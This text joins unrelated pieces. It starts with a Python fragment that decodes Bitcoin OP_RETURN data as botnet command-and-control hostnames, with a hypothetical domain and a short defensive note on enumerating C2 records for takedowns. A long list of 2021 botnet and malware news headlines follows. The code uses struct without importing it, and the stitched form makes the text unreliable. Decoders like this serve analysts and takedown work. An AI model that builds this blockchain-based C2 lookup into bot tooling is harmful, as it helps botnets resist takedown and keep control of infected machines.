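from typing import List

# --- minimal legacy-transaction encoding helpers (used only to build the sample) ---

def _encode_varint(n: int) -> bytes:
    if n < 0xFD:
        return bytes([n])
    if n <= 0xFFFF:
        return b"\xfd" + struct.pack("<H", n)
    if n <= 0xFFFFFFFF:
        return b"\xfe" + struct.pack("<I", n)
    return b"\xff" + struct.pack("<Q", n)


def _push(data: bytes) -> bytes:
    """Script data push: direct (<=75 bytes), OP_PUSHDATA1 or OP_PUSHDATA2."""
    n = len(data)
    if n <= 75:
        return bytes([n]) + data
    if n <= 0xFF:
        return b"\x4c" + bytes([n]) + data
    return b"\x4d" + struct.pack("<H", n) + data


def build_op_return_tx(payload: bytes) -> bytes:
    """Constructed, unsigned one-input transaction whose single output is
    OP_RETURN <payload>. Not a real on-chain transaction."""
    script = b"\x6a" + _push(payload)
    tx = struct.pack("<I", 1)                                   # version
    tx += _encode_varint(1)                                     # input count
    tx += b"\x00" * 32 + struct.pack("<I", 0xFFFFFFFF)          # dummy outpoint
    tx += _encode_varint(0) + struct.pack("<I", 0xFFFFFFFF)     # empty scriptSig, sequence
    tx += _encode_varint(1)                                     # output count
    tx += struct.pack("<q", 0) + _encode_varint(len(script)) + script
    tx += struct.pack("<I", 0)                                  # locktime
    return tx


# --- the part a bot (or an analyst's decoder) actually needs ---

def _read_varint(raw: bytes, pos: int):
    first = raw[pos]
    if first < 0xFD:
        return first, pos + 1
    if first == 0xFD:
        return struct.unpack_from("<H", raw, pos + 1)[0], pos + 3
    if first == 0xFE:
        return struct.unpack_from("<I", raw, pos + 1)[0], pos + 5
    return struct.unpack_from("<Q", raw, pos + 1)[0], pos + 9


def _data_pushes(script: bytes) -> List[bytes]:
    """Collect the data pushes following OP_RETURN; stop at anything else."""
    out, i = [], 0
    while i < len(script):
        op = script[i]
        i += 1
        if 1 <= op <= 75:
            n = op
        elif op == 0x4C and i < len(script):
            n, i = script[i], i + 1
        elif op == 0x4D and i + 1 < len(script):
            n, i = struct.unpack_from("<H", script, i)[0], i + 2
        else:
            break
        out.append(script[i:i + n])
        i += n
    return out


def op_return_payloads(raw: bytes) -> List[bytes]:
    """Walk a serialised transaction and return every OP_RETURN data push.
    Skips the segwit marker so outputs are found in either serialisation."""
    pos = 4                                   # version
    if raw[pos:pos + 2] == b"\x00\x01":       # segwit marker + flag
        pos += 2
    n_in, pos = _read_varint(raw, pos)
    for _ in range(n_in):
        pos += 36                             # previous txid + index
        slen, pos = _read_varint(raw, pos)
        pos += slen + 4                       # scriptSig + sequence
    n_out, pos = _read_varint(raw, pos)
    payloads = []
    for _ in range(n_out):
        pos += 8                              # value
        slen, pos = _read_varint(raw, pos)
        script = raw[pos:pos + slen]
        pos += slen
        if script[:1] == b"\x6a":
            payloads.extend(_data_pushes(script[1:]))
    return payloads


def c2_hosts_from_tx(raw: bytes) -> List[str]:
    """Decode pushes as plain ASCII hostnames (an assumption of this example)."""
    hosts = []
    for blob in op_return_payloads(raw):
        try:
            hosts.append(blob.decode("ascii"))
        except UnicodeDecodeError:
            continue
    return hosts


if __name__ == "__main__":
    sample = build_op_return_tx(b"c2.example.test")   # hypothetical domain
    print(sample.hex())
    print(c2_hosts_from_tx(sample))
```

The defensive takeaway is the flip side of the same decoder: because the chain is append-only and public, the operator cannot delete an old C2 record, so pulling the OP_RETURN history of the address a sample queries gives you every C2 it has ever been pointed at, which is exactly the kind of enumeration a takedown needs.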
December 08, 2021
140,000 Reasons Why Emotet is Piggybacking on TrickBot in its Return from the Dead Full Text
Abstract
The operators of TrickBot malware have infected an estimated 140,000 victims across 149 countries a little over a year after attempts were made to dismantle its infrastructure, even as the malware is fast becoming an entry point for Emotet, another botnet that was taken down at the start of 2021. Most of the victims detected since November 1, 2020, are from Portugal (18%), the U.S. (14%), and India (5%), followed by Brazil (4%), Turkey (3%), Russia (3%), and China (3%), Check Point Research noted in a report shared with The Hacker News, with government, finance, and manufacturing entities emerging as the top affected industry verticals. "Emotet is a strong indicator of future ransomware attacks, as the malware provides ransomware gangs a backdoor into compromised machines," said the researchers, who detected 223 different Trickbot campaigns over the course of the last six months. Both TrickBot and Emotet are botnets, which are networks of internet-connected devices infected byThe Hacker News
December 8, 2021
Identity Verification Company Incode Raises $220 Million at $1.25 Billion Valuation Full Text
Abstract
The funding round was led by General Atlantic and SoftBank, but Capital One Ventures, Coinbase Ventures, J.P. Morgan, and SVCI also participated, along with other existing investors.Security Week
December 08, 2021
Moobot botnet spreading via Hikvision camera vulnerability Full Text
Abstract
A Mirai-based botnet called 'Moobot' is spreading aggressively via exploiting a critical command injection flaw in the webserver of many Hikvision products.BleepingComputer
December 7, 2021
Google disrupts the Glupteba botnet Full Text
Abstract
Google announced that it has disrupted the Glupteba botnet, a huge infrastructure composed of more than 1 million Windows PCs worldwide. Google announced that it has taken down the infrastructure operated by Glupteba; it also sued Russian nationals Dmitry...Security Affairs
December 07, 2021
Google files lawsuit against Russian hackers as part of disrupting botnet Full Text
Abstract
Google on Tuesday announced it is pursuing litigation to disrupt a botnet run by operators based out of Russia, among other steps meant to crack down on the group.The Hill
December 2, 2021
AT&T Takes Steps to Mitigate Botnet Found Inside Its Network Full Text
Abstract
AT&T is battling a modular malware called EwDoor on 5,700 VoIP servers, but it could have a larger wildcard certificate problem.Threatpost
December 1, 2021
TrickBot Again (But With a Twist) Checks Screen Resolution to Avoid Detection Full Text
Abstract
The Trickbot gang is once again doing a screen resolution check to identify virtual machines before deploying payloads, and hence trying to stay under the radar with its improved techniques. Experts say this is the first time a gang has used a script in an HTML attachment to check for screen...Cyware Alerts - Hacker News
December 01, 2021
New EwDoor Botnet Targeting Unpatched AT&T Network Edge Devices Full Text
Abstract
A newly discovered botnet capable of staging distributed denial-of-service (DDoS) attacks targeted unpatched Ribbon Communications (formerly Edgewater Networks) EdgeMarc appliances belonging to telecom service provider AT&T by exploiting a four-year-old flaw in the network appliances. Chinese tech giant Qihoo 360's Netlab network security division, which detected the botnet first on October 27, 2021, called it EwDoor , noting it observed 5,700 compromised IP addresses located in the U.S. during a brief three-hour window. "So far, the EwDoor in our view has undergone three versions of updates, and its main functions can be summarized into two main categories of DDoS attacks and backdoor," the researchers noted . "Based on the attacked devices are telephone communication related, we presume that its main purpose is DDoS attacks, and gathering of sensitive information, such as call logs." Propagating through a flaw in EdgeMarc devices, EwDoor supports aThe Hacker News
November 30, 2021
Finland Faces Blizzard of Flubot-Spreading Text Messages Full Text
Abstract
Millions of texts leading to the Flubot spyware/banking trojan are targeting everyone who uses Androids in the country, in an “exceptional” attack.Threatpost
November 30, 2021
New EwDoor Botnet is targeting AT&T customers Full Text
Abstract
360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices. Experts from Qihoo 360's Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers...Security Affairs
November 30, 2021
EwDoor botnet targets AT&T network edge devices at US firms Full Text
Abstract
A recently discovered botnet is attacking unpatched AT&T enterprise network edge devices using exploits for a four-year-old critical severity Blind Command Injection security flaw.BleepingComputer
November 19, 2021
Emotet botnet comeback orchestrated by Conti ransomware gang Full Text
Abstract
The Emotet botnet is back by popular demand, resurrected by its former operator, who was convinced by members of the Conti ransomware gang.BleepingComputer
November 16, 2021
Notorious Emotet Botnet Makes a Comeback with the Help of TrickBot Malware Full Text
Abstract
The notorious Emotet malware is staging a comeback of sorts nearly 10 months after a coordinated law enforcement operation dismantled its command-and-control infrastructure in late January 2021. According to a new report from security researcher Luca Ebach, the infamous TrickBot malware is being used as an entry point to distribute what appears to be a new version of Emotet on systems previously infected by the former. The latest variant takes the form of a DLL file, with the first occurrence of the deployment being detected on November 14. Europol dubbed Emotet as the "world's most dangerous malware" for its ability to act as a "door opener" for threat actors to obtain unauthorized access, becoming a precursor to many critical data theft and ransomware attacks. Interestingly, the loader operation enabled other malware families such as Trickbot, QakBot, and Ryuk to enter a machine. The resurfacing is also significant not least because it followThe Hacker News
November 15, 2021
Emotet malware is back and rebuilding its botnet via TrickBot Full Text
Abstract
The Emotet malware was considered the most widely spread malware in the past, using spam campaigns and malicious attachments to distribute the malware.BleepingComputer
November 12, 2021
Qbot Spam Campaigns Continue to Explode Full Text
Abstract
According to researchers from Kaspersky, in the first seven months of 2021 the number of users affected by QBot, which was first discovered in 2007, was 65% higher than in the same period of the previous year.Cyware Alerts - Hacker News
November 11, 2021
Abcbot — A New Evolving Wormable Botnet Malware Targeting Linux Full Text
Abstract
Researchers from Qihoo 360's Netlab security team have released details of a new evolving botnet called " Abcbot " that has been observed in the wild with worm-like propagation features to infect Linux systems and launch distributed denial-of-service (DDoS) attacks against targets. While the earliest version of the botnet dates back to July 2021, new variants observed as recently as October 30 have been equipped with additional updates, including a custom implementation of DDoS functionality, to strike Linux web servers that use weak passwords or are susceptible to N-day vulnerabilities, indicating that the malware is under continuous development. Netlab's findings also build on a report from Trend Micro early last month, which publicized attacks targeting Huawei Cloud with cryptocurrency-mining and cryptojacking malware. The intrusions were also notable for the fact that the malicious shell scripts specifically disabled a process designed to monitor and scan the serThe Hacker News
November 11, 2021
BotenaGo botnet targets millions of IoT devices with 33 exploits Full Text
Abstract
A new BotenaGo malware botnet has been discovered using over thirty exploits to attack millions of routers and IoT devices.BleepingComputer
November 11, 2021
TrickBot Operators Partner with Shathak Attackers for Conti Ransomware Full Text
Abstract
The operators of TrickBot trojan are collaborating with the Shathak threat group to distribute their wares, ultimately leading to the deployment of Conti ransomware on infected machines. "The implementation of TrickBot has evolved over the years, with recent versions of TrickBot implementing malware-loading capabilities," Cybereason security analysts Aleksandar Milenkoski and Eli Salem said in a report analysing recent malware distribution campaigns undertaken by the group. "TrickBot has played a major role in many attack campaigns conducted by different threat actors, from common cybercriminals to nation-state actors." The latest report builds on a report from IBM X-Force last month, which revealed TrickBot's partnerships with other cybercrime gangs, including Shathak, to deliver proprietary malware. Also tracked under the moniker TA551, Shathak is a sophisticated cybercrime actor targeting end-users on a global scale, acting as a malware distributorThe Hacker News
November 11, 2021
Abcbot: A New Botnet in the Making Full Text
Abstract
Abcbot is slowly moving from infancy to maturity, according to researchers. The creators behind the botnet are testing various technologies with an aim to evolve the botnet with sophisticated features.Cyware Alerts - Hacker News
November 10, 2021
TrickBot teams up with Shatak phishers for Conti ransomware attacks Full Text
Abstract
A threat actor tracked as Shatak (TA551) recently partnered with the ITG23 gang (aka TrickBot and Wizard Spider) to deploy Conti ransomware on targeted systems.BleepingComputer
November 8, 2021
Experts Disclose Pink Botnet Amidst Multiple DDoS Alerts Full Text
Abstract
Researchers recently reported a massive DDoS campaign involving Pink botnet that had infected millions of devices. It is touted as the largest botnet observed in the last six years.Cyware Alerts - Hacker News
November 01, 2021
Researchers Uncover ‘Pink’ Botnet Malware That Infected Over 1.6 Million Devices Full Text
Abstract
Cybersecurity researchers disclosed details of what they say is the "largest botnet" observed in the wild in the last six years, infecting over 1.6 million devices primarily located in China, with the goal of launching distributed denial-of-service (DDoS) attacks and inserting advertisements into HTTP websites visited by unsuspecting users. Qihoo 360's Netlab security team dubbed the botnet " Pink " based on a sample obtained on November 21, 2019, owing to a large number of function names starting with "pink." Mainly targeting MIPS-based fiber routers, the botnet leverages a combination of third-party services such as GitHub, peer-to-peer (P2P) networks, and central command-and-control (C2) servers for bot-to-controller communications, not to mention completely encrypting the transmission channels to prevent the victimized devices from being taken over. "Pink raced with the vendor to retain control over the infected devices, while vendorThe Hacker News
November 1, 2021
Pink Botnet infected over 1.6 Million Devices, it is one of the largest botnet ever seen Full Text
Abstract
Cybersecurity researchers uncovered a huge botnet, tracked as Pink, that already infected over 1.6 million devices most of them located in China. Qihoo 360's Netlab Cybersecurity researchers discovered a huge botnet, tracked as Pink, that already...Security Affairs
October 30, 2021
TrickBot member extradited to US faces up to 60 years in prison Full Text
Abstract
An alleged member of the TrickBot gang, the Russian national Vladimir Dunaev (aka FFX), has been extradited to the US. Vladimir Dunaev (38), a Russian national suspected to be a member of the infamous TrickBot gang, has been extradited to the U.S....Security Affairs
October 20, 2021
PurpleFox botnet variant uses WebSockets for more secure C2 communication Full Text
Abstract
Researchers warn of a new evolution of the PurpleFox botnet; its operators have added new exploits and leverage WebSockets for C2 communication. Researchers from Trend Micro have documented a recent evolution of the PurpleFox botnet, the experts discovered...Security Affairs
October 20, 2021
New PurpleFox botnet variant uses WebSockets for C2 communication Full Text
Abstract
The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, now also leveraging WebSockets for C2 bidirectional communication.BleepingComputer
October 17, 2021
TrickBot’s FIN12 is Claiming Victims at Higher Rate Full Text
Abstract
New Mandiant report claims FIN12 has been dropping Ryuk ransomware rapidly across multiple sectors, with one in five victims in the healthcare sector. It targets organizations that have annual revenues over $300 million, with an average of almost $6 billion. The report found that the average time F...Cyware Alerts - Hacker News
October 16, 2021
Trickbot spreads malware through new distribution channels Full Text
Abstract
TrickBot operators are back and are expanding their distribution channels through partnerships with cybercrime affiliates. The operators behind the infamous TrickBot (ITG23 and Wizard Spider) malware have resurfaced with new distribution channels to deliver malicious...Security Affairs
October 15, 2021
Attackers Behind Trickbot Expanding Malware Distribution Channels Full Text
Abstract
The operators behind the pernicious TrickBot malware have resurfaced with new tricks that aim to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti. The threat actor, tracked under the monikers ITG23 and Wizard Spider, has been found to partner with other cybercrime gangs known as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are banking on to deliver proprietary malware, according to a report by IBM X-Force. "These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said . Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan to a modular Windows-based crimeware solution, while alsoThe Hacker News
October 15, 2021
This malware botnet gang has stolen millions with a surprisingly simple trick Full Text
Abstract
The long-running botnet known as MyKings is still in business and has raked in at least $24.7 million by using its network of compromised computers to mine for cryptocurrencies.ZDNet
October 14, 2021
Trickbot Continues to Stay Strong Despite the Recent Arrest of Gang Members Full Text
Abstract
Ever since its re-emergence following the major takedown in 2020, the operators have released new and more persistent versions of the malware to claim successful attacks on victims.Cyware Alerts - Hacker News
October 14, 2021
Freakout Botnet Unleashes a New Bunch of Attacks Full Text
Abstract
Towards the end of September 2021, researchers at Juniper Threat Labs observed new activity from FreakOut aka 3Cr0m0rPh that resulted in the takeover of Visual Tools DVRs.Cyware Alerts - Hacker News
October 13, 2021
MyKings botnet still active and making massive amounts of money Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, making massive amounts of money in crypto, five years after it first appeared in the wild.BleepingComputer
October 13, 2021
FreakOut Botnet Turns DVRs Into Monero Cryptominers Full Text
Abstract
The new Necro Python exploit targets Visual Tools DVRs used in surveillance systems.Threatpost
October 12, 2021
Necro botnet now targets Visual Tools DVRs Full Text
Abstract
The FreakOut (aka Necro, N3Cr0m0rPh) Python botnet evolves, it now includes a recently published PoC exploit for Visual Tools DVR. Operators behind the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet have added a PoC exploit for Visual Tools DVR,...Security Affairs
October 12, 2021
FreakOut botnet now attacks vulnerable video DVR devices Full Text
Abstract
A new update to the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet has added a recently published PoC exploit for Visual Tools DVR in its arsenal to further aid in breaching systems.BleepingComputer
October 11, 2021
Ukraine Arrests Operator of DDoS Botnet with 100,000 Compromised Devices Full Text
Abstract
Ukrainian law enforcement authorities on Monday disclosed the arrest of a hacker responsible for the creation and management of a "powerful botnet" consisting of over 100,000 enslaved devices that was used to carry out distributed denial-of-service (DDoS) and spam attacks on behalf of paid customers. The unnamed individual, from the Ivano-Frankivsk region of the country, is also said to have leveraged the automated network to detect vulnerabilities in websites and break into them as well as stage brute-force attacks in order to guess email passwords. The Ukrainian police agency said it conducted a raid of the suspect's residence and seized their computer equipment as evidence of illegal activity. "He looked for customers on the closed forums and Telegram chats and payments were made via blocked electronic payment systems," the Security Service of Ukraine (SSU) said in a press statement. The payments were facilitated via WebMoney, a Russian money transfer pThe Hacker News
October 11, 2021
Security Service of Ukraine arrested a man operating a huge DDoS botnet Full Text
Abstract
Ukrainian police arrested a cybercriminal who controlled a botnet composed of 100,000 devices that was available for rent to launch DDoS attacks. Security Service of Ukraine (SSU) has arrested a hacker who controlled a DDoS botnet composed of 100,000...Security Affairs
October 8, 2021
New Zealand CERT Warns of FluBot Using New Tricks Full Text
Abstract
The infamous FluBot banking Trojan is targeting New Zealand mobile users wherein it uses different types of text-based messaging lures regarding parcel delivery and FluBot infection alert. After a successful infection, FluBot operators use the malware to steal payment information, text messages, c ...Cyware Alerts - Hacker News
September 30, 2021
WireX DDoS botnet admin charged for attacking hotel chain Full Text
Abstract
The US Department of Justice charged the admin of the WireX Android botnet for targeting an American multinational hotel chain in a distributed denial-of-service (DDoS) attack.BleepingComputer
September 29, 2021
Threat Actors Weaponize Telegram Bots to Compromise PayPal Accounts Full Text
Abstract
A campaign is stealing one-time password tokens to gain access to PayPal, Apple Pay and Google Pay, among others.Threatpost
September 28, 2021
TangleBot is Using Coronavirus Lures to Target Victims Full Text
Abstract
In a new smishing campaign, TangleBot was discovered targeting Android users in the U.S. and Canada with lures related to COVID-19 regulations and vaccine information. Malicious messages, if clicked, notify users that their Flash player has become obsolete and must be updated. Users need to be wa ...Cyware Alerts - Hacker News
September 28, 2021
Twitter Bots Being Used to Trick Users into Making PayPal and Venmo Payments to Fraudsters’ Accounts Full Text
Abstract
The bots appear to be activated when a legitimate user asks another for their payment information, presumably discovering these tweets via a keyword search for ‘PayPal’, ‘Venmo’, or other services.The Daily Swig
September 17, 2021
Experts warn that Mirai Botnet starts exploiting OMIGOD flaw Full Text
Abstract
The Mirai botnet has started exploiting the recently disclosed OMIGOD vulnerability to compromise vulnerable systems exposed online. Threat actors behind a Mirai botnet have started exploiting a critical Azure OMIGOD vulnerability, tracked as CVE-2021-38647,...Security Affairs
September 17, 2021
Mirai Botnet Starts Exploiting OMIGOD Flaw as Microsoft Issues More Guidance Full Text
Abstract
Microsoft on Thursday published additional guidance on addressing recently disclosed vulnerabilities in the OMI framework, along with new protections to secure affected Azure VM management extensions.Security Week
September 16, 2021
Meris Botnet Creates a New Record for DDoS Attacks Full Text
Abstract
Russian internet service provider Yandex experienced one of the biggest DDoS attacks by a botnet dubbed Mēris. It has infected thousands of networking devices so far. The information collected from the multiple attacks revealed that Mēris has a network of more than 30,000 devices. MikroTik has sh ...Cyware Alerts - Hacker News
September 16, 2021
Bad Bots Take the Internet by Storm Full Text
Abstract
Researchers found that there has been a constant rise in bad bots that has surpassed record-high bad bot traffic detected last year – 25.6% of all web requests.Cyware Alerts - Hacker News
September 15, 2021
MikroTik shares info on securing routers hit by massive Mēris botnet Full Text
Abstract
Latvian network equipment manufacturer MikroTik has shared details on how customers can secure and clean routers compromised by the massive Mēris DDoS botnet over the summer.BleepingComputer
September 14, 2021
MikroTik Confirms Mēris Botnet Targets Routers Compromised Years Ago Full Text
Abstract
According to MikroTik, the bots are in fact routers that were previously compromised in 2018, and which haven’t been properly secured, even if the patches released at the time were installed in a timely manner.Security Week
September 14, 2021
Mēris Bot infects MikroTik routers compromised in 2018 Full Text
Abstract
Latvian vendor MikroTik revealed that the recently discovered Mēris botnet is targeting devices that were compromised three years ago. Last week, the Russian Internet giant Yandex was targeted by the largest DDoS attack in the history of Runet,...Security Affairs
September 11, 2021
Mēris Botnet Hit Russia’s Yandex With Massive 22 Million RPS DDoS Attack Full Text
Abstract
Russian internet giant Yandex has been the target of a record-breaking distributed denial-of-service (DDoS) attack by a new botnet called Mēris. The botnet is believed to have pummeled the company's web infrastructure with millions of HTTP requests, before hitting a peak of 21.8 million requests per second (RPS), dwarfing a recent botnet-powered attack that came to light last month, bombarding an unnamed Cloudflare customer in the financial industry with 17.2 million RPS. Russian DDoS mitigation service Qrator Labs, which disclosed details of the attack on Thursday, called Mēris (meaning "Plague" in the Latvian language) a "botnet of a new kind." "It is also clear that this particular botnet is still growing. There is a suggestion that the botnet could grow in force through password brute-forcing, although we tend to neglect that as a slight possibility. That looks like some vulnerability that was either kept secret before the massive campaignThe Hacker News
September 9, 2021
A new botnet named Mēris is behind massive DDoS attack that hit Yandex Full Text
Abstract
The massive DDoS attack that has been targeting the internet giant Yandex was powered by a completely new botnet tracked as Mēris. The Russian Internet giant Yandex was targeted by the largest DDoS attack in the history of Runet, the Russian...Security Affairs
September 09, 2021
New Mēris botnet breaks DDoS record with 21.8 million RPS attack Full Text
Abstract
A new distributed denial-of-service (DDoS) botnet that kept growing over the summer has been hammering Russian internet giant Yandex for the past month, the attack peaking at the unprecedented rate of 21.8 million requests per second.BleepingComputer
September 7, 2021
39% of all internet traffic is from bad bots Full Text
Abstract
These bad bots include both basic web scrapers and attack scripts, as well as advanced persistent bots that try to evade defenses and attempt to perform their malicious activities under the radar.Help Net Security
September 7, 2021
Authorities Arrest Another TrickBot Gang Member in South Korea Full Text
Abstract
A hacker known only as “Mr. A” was picked up by authorities at a South Korean airport after getting stuck in the country due to COVID-19 travel restrictions.Threatpost
September 6, 2021
TrickBot gang developer arrested at the Seoul international airport Full Text
Abstract
A Russian man accused of being a member of the infamous TrickBot gang was arrested while trying to leave South Korea A Russian man accused of being a member of the TrickBot gang was arrested last week at the Seoul international airport. The man has remained...Security Affairs
September 6, 2021
A Quick Analysis of QakBot, a Decade-Old Threat Full Text
Abstract
Kaspersky provided a detailed technical analysis of QakBot, a decade-old Trojan that has been active since 2007. It also underlines the stats of victims. In the first seven months of this year, Kaspersky spotted 181,869 attempts to download or execute QakBot. Experts say one must track its activitie ...Cyware Alerts - Hacker News
September 5, 2021
Authors Detained but Mozi Botnet will Continue to Lurk, Here’s Why Full Text
Abstract
Despite its authors being detained, the Mozi botnet is unstoppable. The botnet uses a peer-to-peer network structure, which is a major factor in helping the malware propagate even when some of its nodes go down. New findings from a new report reveal why Mozi, which accounted for 1.55 million infe ...Cyware Alerts - Hacker News
September 02, 2021
Chinese Authorities Arrest Hackers Behind Mozi IoT Botnet Attacks Full Text
Abstract
The operators of the Mozi IoT botnet have been taken into custody by Chinese law enforcement authorities, nearly two years after the malware emerged on the threat landscape in September 2019. News of the arrest, which originally happened in June, was disclosed by researchers from Netlab, the network research division of Chinese internet security company Qihoo 360, earlier this Monday, detailing its involvement in the operation. "Mozi uses a P2P [peer-to-peer] network structure, and one of the 'advantages' of a P2P network is that it is robust, so even if some of the nodes go down, the whole network will carry on, and the remaining nodes will still infect other vulnerable devices, that is why we can still see Mozi spreading," said Netlab, which spotted the botnet for the first time in late 2019. The development also comes less than two weeks after Microsoft Security Threat Intelligence Center revealed the botnet's new capabilities that enable it to interThe Hacker News
September 1, 2021
Mozi infections will slightly decrease but it will stay alive for some time to come Full Text
Abstract
The Mozi botnet continues to spread despite the arrest of its alleged author and experts believe that it will run for many other years. Mozi is an IoT botnet that borrows the code from Mirai variants and the Gafgyt malware,...Security Affairs
August 30, 2021
Phorpiex botnet shuts down, source code goes up for sale Full Text
Abstract
The ad, posted by an individual earlier linked to the botnet’s operation, claims that neither of its two authors is involved in running the botnet, hence the reason they decided to sell its source code.The Record
August 29, 2021
DirtyMoe Botnet Returns with New Tricks Full Text
Abstract
A new DirtyMoe botnet variant was discovered with major modifications in the form of anti-forensic, anti-debugging, and anti-tracking capabilities. The attackers use VMProtect and their own encryption algorithm to evade detection. Besides vulnerability management solutions, enterprises must en ...Cyware Alerts - Hacker News
August 29, 2021
LokiBot Uses Old-but-Tested Tricks to Lure Victims Full Text
Abstract
Trend Micro has identified a new malware distribution campaign delivering the LokiBot banking trojan using multiple old yet effective tactics. The customers were being targeted via emails masquerading as an order invoice, with a PDF file attached. It's critical that organizations patch vulnera ...Cyware Alerts - Hacker News
August 28, 2021
Phorpiex botnet shuts down and authors put source code for sale Full Text
Abstract
Crooks behind the Phorpiex botnet have shut down their operations and put the source code for sale on the dark web. The criminal organization behind the Phorpiex botnet has shut down its operations and put the source code of the bot for sale on a cybercrime...Security Affairs
August 25, 2021
Mirai Botnet Variant Targeting Vulnerabilities in Realtek Devices Full Text
Abstract
Mirai-based botnet operators were found exploiting a new security flaw in the Realtek SDK, impacting hundreds of thousands of devices worldwide. The vulnerabilities were spotted in Realtek chipsets just two days ago. Vulnerable device owners are recommended to apply the patch as soon as possible.Cyware Alerts - Hacker News
August 25, 2021
Network Gateways are on the Radar of Mozi Full Text
Abstract
Mozi, a P2P botnet known to target IoT products, has gained new capabilities to aim at network gateways created by Huawei, Netgear, and ZTE. Mozi propagates by exploiting weak and default remote access passwords and unpatched vulnerabilities. The key security recommendation is always to use a stron ...Cyware Alerts - Hacker News
August 25, 2021
DirtyMoe Botnet Returns With Undetectable Threat Profile Full Text
Abstract
DirtyMoe’s attack chain begins with the attackers attempting to gain admin privileges on a target’s Windows machine. It often relies on the PurpleFox exploit kit to misuse EternalBlue.Security Intelligence
August 24, 2021
Realtek SDK flaws exploited to deliver Mirai bot variant Full Text
Abstract
Researchers warn that threat actors are actively exploiting Realtek SDK vulnerabilities since their technical details were publicly disclosed. Researchers from SAM Seamless Network warn that threat actors are actively exploiting Realtek SDK vulnerabilities since...Security Affairs
August 23, 2021
Botnet targets hundreds of thousands of devices using Realtek SDK Full Text
Abstract
A Mirai-based botnet now targets a critical vulnerability in the software SDK used by hundreds of thousands of Realtek-based devices, encompassing 200 models from at least 65 vendors, including Asus, Belkin, D-Link, Netgear, Tenda, ZTE, and Zyxel.BleepingComputer
August 23, 2021
Report Shows Even More Similarities Between Diavol Ransomware and TrickBot Full Text
Abstract
The new ransomware family is called Diavol and it is believed to have connections to the Wizard Spider threat actor as the researchers discovered a few similarities in the operation mode employed by the malware.Heimdal Security
August 20, 2021
Mozi IoT Botnet Now Also Targets Netgear, Huawei, and ZTE Network Gateways Full Text
Abstract
Mozi, a peer-to-peer (P2P) botnet known to target IoT devices, has gained new capabilities that allow it to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE, according to new findings. "Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks," researchers at Microsoft Security Threat Intelligence Center and Section 52 at Azure Defender for IoT said in a technical write-up. "By infecting routers, they can perform man-in-the-middle (MITM) attacks—via HTTP hijacking and DNS spoofing—to compromise endpoints and deploy ransomware or cause safety incidents in OT facilities." First documented by Netlab 360 in December 2019, Mozi has a history of infecting routers and digital video recorders in order to assemble them into an IoT botnet, which could be abused for launching distributed denial-of-service (DDoS) attacks, data exfiltration, and payload executionThe Hacker News
August 20, 2021
Mozi P2P Botnet also targets Netgear, Huawei, and ZTE devices Full Text
Abstract
The Mozi botnet continues to evolve; its authors have implemented new capabilities to target Netgear, Huawei, and ZTE network gateways. Microsoft researchers reported that the Mozi botnet was improved by implementing new capabilities to target network gateways...Security Affairs
August 11, 2021
The cost of unwanted bot traffic - up to $250M a year Full Text
Abstract
During the pandemic, online presence has become crucial for retail businesses. It has also led to the challenge of evasive malicious bots that are now leeching off already vulnerable businesses.Cyber News
August 9, 2021
StealthWorker botnet targets Synology NAS devices to drop ransomware Full Text
Abstract
Taiwanese vendor Synology has warned customers that the StealthWorker botnet is targeting their NAS devices to deliver ransomware. Taiwan-based vendor Synology has warned customers that the StealthWorker botnet is conducting brute-force attacks in an attempt...Security Affairs
August 4, 2021
LemonDuck Botnet Evolves to Allow Hands-on-Keyboard Attacks Full Text
Abstract
A relatively new term in the cybersecurity world, hands-on-keyboard attacks are when threat actors stop using automated scripts and manually log into an infected system to execute commands themselves.The Record
August 4, 2021
Social engineering goes automatic: New robocall bot on Telegram can trick you into giving up your password Full Text
Abstract
The so-called OTP Bot can trick victims into sending criminals passwords to their bank accounts, email, and other online services – all without any direct interaction with the victim.Cyber News
August 01, 2021
Bot protection now generally available in Azure Web Application Firewall Full Text
Abstract
Microsoft has announced that the Web Application Firewall (WAF) bot protection feature has reached general availability on Azure on Application Gateway starting this week.BleepingComputer
July 23, 2021
Estonian hacker Pavel Tsurkan pleads guilty for operating a proxy botnet. Full Text
Abstract
Estonian hacker Pavel Tsurkan has pleaded guilty in a United States court to the counts of computer fraud and of creating and operating a proxy botnet. The Estonian national Pavel Tsurkan has pleaded guilty in a United States court to two counts of computer...Security Affairs
July 21, 2021
Why Current Botnet Takedown Jurisprudence Should Not Be Replicated Full Text
Abstract
Restraining orders and other equitable mechanisms of relief were never designed to address such a unique challenge as global cybercrime.Lawfare
July 19, 2021
TeaBot Trojan Striking Harder, Targeting More European Banks Full Text
Abstract
Prodaft researchers are warning of an Android banking botnet dubbed Teabot or Anasta that has been targeting the customers of 60 banks in Europe and is growing rapidly. Moreover, the inclusion of several sophisticated tricks such as targeting crypto wallets and abusing Accessibility Services makes it ...Cyware Alerts - Hacker News
July 17, 2021
Trickbot Thrives Again with Virtual Network Computing Module Full Text
Abstract
Recently, Trickbot actors were found adding a new Virtual Network Computing (VNC) module to its arsenal that helps an actor monitor high-profile targets and gather intelligence from them. The frequent developments in Trickbot’s lifecycle and an accelerated rate of propagation highlight the actual ...Cyware Alerts - Hacker News
July 14, 2021
Trickbot updates its VNC module for high-value targets Full Text
Abstract
The Trickbot botnet malware that often distributes various ransomware strains, continues to be the most prevalent threat as its developers update the VNC module used for remote control over infected systems.BleepingComputer
July 8, 2021
How Fake Accounts and Sneaker-Bots Took Over the Internet Full Text
Abstract
Jason Kent, hacker-in-residence at Cequence Security, discusses fake online accounts, and the fraud they carry out on a daily basis.Threatpost
July 7, 2021
Mirai_ptea: The Latest Mirai-Inspired Botnet Full Text
Abstract
